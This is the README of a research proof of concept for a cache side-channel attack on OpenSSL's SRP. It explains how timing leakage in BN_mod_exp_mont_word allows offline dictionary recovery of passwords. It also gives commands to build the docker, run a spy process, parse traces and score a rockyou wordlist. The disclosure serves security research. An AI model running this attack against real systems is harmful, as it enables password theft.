# Proof of Concept attack on SRP

This repository contains a proof of concept of an attack on the OpenSSL implementation of SRP (Secure Remote Password). We recall that, within SRP, a password (a shared secret of low entrpy) is involved into the ephemeral key generation process. By design, SRP resists offline dictionary attacks. However, we show that such attacks are still possible to recover the used password efficiently, by exploiting some data leakage during an insecure modular exponentiation.

The call tree of our attack is the following:

	* SRP_Calc_client_key: crypto/srp/srp_lib.c
		* BN_mod_exp:  crypto/bn/bn_exp.c
			* BN_mod_exp_mont_word:  crypto/bn/bn_exp.c

Roughly speaking, the vulnerability is caused by the nature non constant-time of the function `BN_mod_exp_mont_word`.
The attack was tested on OpenSSL 1.1.1h, but should work on other versions too.

## Repository layout

* PoC_material: contains all the materials to be used to build the docker
* shared_folder: is shared between the docker and the host, making it easier to transmit files. Namely, it contains a sample of the data we were able to extract during our experiment.

## Run the PoC

We provide a docker to avoid any compatibility issue. However, it is worth noting that the nature of our attack (cache side-channels) makes the exact outcome of the spy process dependent of the executing CPU, which might lead to less reliable results. This reliability issue can be solved with more automated approach concerning the cache attack. However, we decided not to focus on that for this PoC. Instead, we included a sample of our results in shared_folder/traces. 

First, build the docker, which may take some time (longest part of our PoC):
```
docker build --rm -t parasite_openssl .
```
Once the build is done, you can simply run it:
```
docker run --mount type=bind,source="$(pwd)"/shared_folder,target=/PoC_PARASITE/shared_folder -it parasite_openssl
```

Inside the docker, you may run the following command to reproduce our results:
```bash
# Launch the SRP simulation along with the spy process to acquire some traces
./poc.sh -p superpassword
# Interpret the execution trace generated by the spy process to extract information
trace_parser.py traces_admin_superpassword_0102030405060708/* > infos_admin_superpassword_0102030405060708.txt
# Given the extracted information, compute a matching score for all passwords in the dictionary. The lower the score, the higher the chance we found the correct password
for info in $(cat infos_admin_superpassword_0102030405060708.txt | grep -v "Error");
do
    dict_reducer /usr/share/dict/rockyou.txt $info
done
```

As mentioned above, the first step may be an issue on different CPU, so you may need to run the parsing and reduction on the data we provide to get reliable results.
To do so, simply run:
```bash
trace_parser.py shared_folder/traces/traces_admin_dAdinretAm_0102030405060708/* > infos_admin_dAdinretAm_0102030405060708.txt
for info in $(cat infos_admin_dAdinretAm_0102030405060708.txt | grep -v "Error");
do
    dict_reducer /usr/share/dict/rockyou.txt $info
done
``` 
